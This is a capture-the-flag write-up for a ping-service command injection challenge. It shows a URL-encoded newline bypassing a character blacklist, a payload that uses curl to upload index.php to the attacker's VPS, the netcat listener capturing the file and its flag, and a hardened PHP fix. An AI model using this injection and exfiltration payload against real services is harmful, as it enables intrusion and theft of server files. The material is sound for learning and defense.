Find a vulnerability in this service and exploit it. Some protections were added.
The flag is on the index.php file.
Two possible results:
	  ping ok
	  
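	Common command separators:
		  &   the command after it runs whether the one before it succeeds or fails
		  &&  if the command before it fails, the command after it is not executed
		  |   the statement before it is not executed, whether true or false
		  ||  if the command before it succeeds, the command after it is not executed
None of the above work; %0A (a URL-encoded newline) does.
       Here sleep 60s is used to check whether the statement after it is executed.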
Use curl to read index.php
  payload: ip=127.0.0.1%0acurl -F `filename=@index.php`  *.*.*.*:9999   (*.*.*.* is the IP address of the VPS)
 nc -lvvp 9999
  Listening on [0.0.0.0] (family 0, port 9999)
  Connection from challenge01.root-me.org 49010 received!
  POST / HTTP/1.1
  Host: *.*.*.*:9999 
  User-Agent: curl/7.47.0
  Accept: */*
  Content-Length: 1008
  Expect: 100-continue
  Content-Type: multipart/form-data; boundary=------------------------0fee3a45749c037a
  --------------------------0fee3a45749c037a
  Content-Disposition: form-data; name="filename"; filename="index.php"
  Content-Type: application/octet-stream
  <html>
  <head>
  <title>Ping Service</title>
  </head>
  <body>
  <form method="POST" action="index.php">
          <input type="text" name="ip" placeholder="127.0.0.1">
          <input type="submit">
  </form>
  <pre>
  <?php
  $flag = "Comma@nd_1nJec7ion_Fl@9_1337_Th3_G@m3!!!";
  if(isset($_POST["ip"]) && !empty($_POST["ip"])){
          $ip = @preg_replace("/[\\\$|`;&<>]/", "", $_POST["ip"]);
          $response = @shell_exec("timeout 5 bash -c 'ping -c 3 ".$ip."'");
          $receive = @preg_match("/3 packets transmitted, (.*) received/s",$response,$out);
          if ($out[1]=="3")
          {
                  echo "Ping OK";
          }
          elseif ($out[1]=="0")
          {
                  echo "Ping NOK";
          }
          else
          {
                  echo "Syntax Error";
          }
  }
  ?>
  </pre>
  </body>
  </html>
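
Why the filter in the dumped index.php lets %0A through, and one way to close the hole, as an added example that is not part of the original write-up or the challenge's own code. blacklist_filter() copies the regex from the dump; valid_ip() and safe_ping() are hypothetical names, and the array form of proc_open() assumes PHP 7.4 or later.

```php
<?php
// The challenge's filter, copied from the dumped index.php: the character
// class removes $ | ` ; & < > but contains no newline, so %0A survives.
function blacklist_filter(string $ip): string
{
    return preg_replace("/[\\\$|`;&<>]/", "", $ip);
}

// Allowlist instead of blacklist: accept only a literal IPv4 address.
function valid_ip(string $ip): ?string
{
    $checked = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    return $checked === false ? null : $checked;
}

// Hypothetical hardened replacement for the shell_exec() call.
function safe_ping(string $input): string
{
    $ip = valid_ip($input);
    if ($ip === null) {
        return "Syntax Error";
    }
    // Array form of proc_open() runs the program directly, with no shell,
    // so separators and newlines are never interpreted as command syntax.
    $cmd = ["timeout", "5", "ping", "-c", "3", $ip];
    $spec = [1 => ["pipe", "w"], 2 => ["file", "/dev/null", "w"]];
    $proc = proc_open($cmd, $spec, $pipes);
    if (!is_resource($proc)) {
        return "Syntax Error";
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    if (preg_match("/3 packets transmitted, (\d+) received/", $out, $m)) {
        return $m[1] === "3" ? "Ping OK" : ($m[1] === "0" ? "Ping NOK" : "Syntax Error");
    }
    return "Syntax Error";
}

// Constructed inputs: a plain address and one carrying an embedded newline.
$samples = ["127.0.0.1", "127.0.0.1\nid"];
foreach ($samples as $s) {
    printf("%-18s blacklist keeps newline: %-3s  allowlist accepts: %s\n",
        json_encode($s),
        strpos(blacklist_filter($s), "\n") !== false ? "yes" : "no",
        valid_ip($s) !== null ? "yes" : "no");
}
```
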
Command injection - Filter bypass
Original post: https://www.cnblogs.com/abbin-blog/p/12111302.html